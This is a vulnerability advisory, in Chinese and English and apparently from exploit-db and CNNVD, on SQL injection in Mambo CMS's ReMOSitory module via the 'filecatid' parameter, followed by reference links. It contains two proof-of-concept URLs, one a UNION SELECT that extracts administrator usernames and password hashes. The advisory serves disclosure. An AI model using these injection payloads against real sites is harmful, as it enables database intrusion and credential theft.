https://www.exploit-db.com/exploits/24613
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1187

MamboOpenSource是一套基于PHP和MySql的开源网站内容管理系统（CMS）。该系统支持搜索引擎优化、模板/主题下载和流量统计等。ReMOSitoryServer是MamboOpenServer扩展组件。ReMOSitoryServer不正确处理用户提交的URL参数，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感数据库信息。主要问题是对用户提交给’filecatid’参数数据缺少充分过滤，用户提交包含恶意SQL命令的数据作为此参数数据，可更改原有SQL逻辑，获得敏感信息或可能更改数据库数据。

source: http://www.securityfocus.com/bid/11219/info

It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input.

Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.

http://www.example.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
http://www.example.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9
,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*

来源:www.mamboportal.com
链接:http://www.mamboportal.com/content/view/1615/
来源:SECTRACK
名称:1011356
链接:http://securitytracker.com/id?1011356
来源:SECUNIA
名称:12597
链接:http://secunia.com/advisories/12597/
来源:XF
名称:remository-filecatid-sql-injection(17441)
链接:http://xforce.iss.net/xforce/xfdb/17441
来源:BID
名称:11219
链接:http://www.securityfocus.com/bid/11219
来源:OSVDB
名称:10040
链接:http://www.osvdb.org/10040
来源:BUGTRAQ
名称:20040919Re:MamboPortallastedversion4.5.1(1.09)andlowervesion:SQLinjectionVulnerability.
链接:http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html
来源:BUGTRAQ
名称:20040917MamboPortallastedversion4.5.1(1.09)andlowervesion:SQLinjectionVulnerability.
链接:http://archives.neohapsis.com/archives/bugtraq/2004-09/0215.html
来源：NSFOCUS
名称：6908
链接：http://www.nsfocus.net/vulndb/6908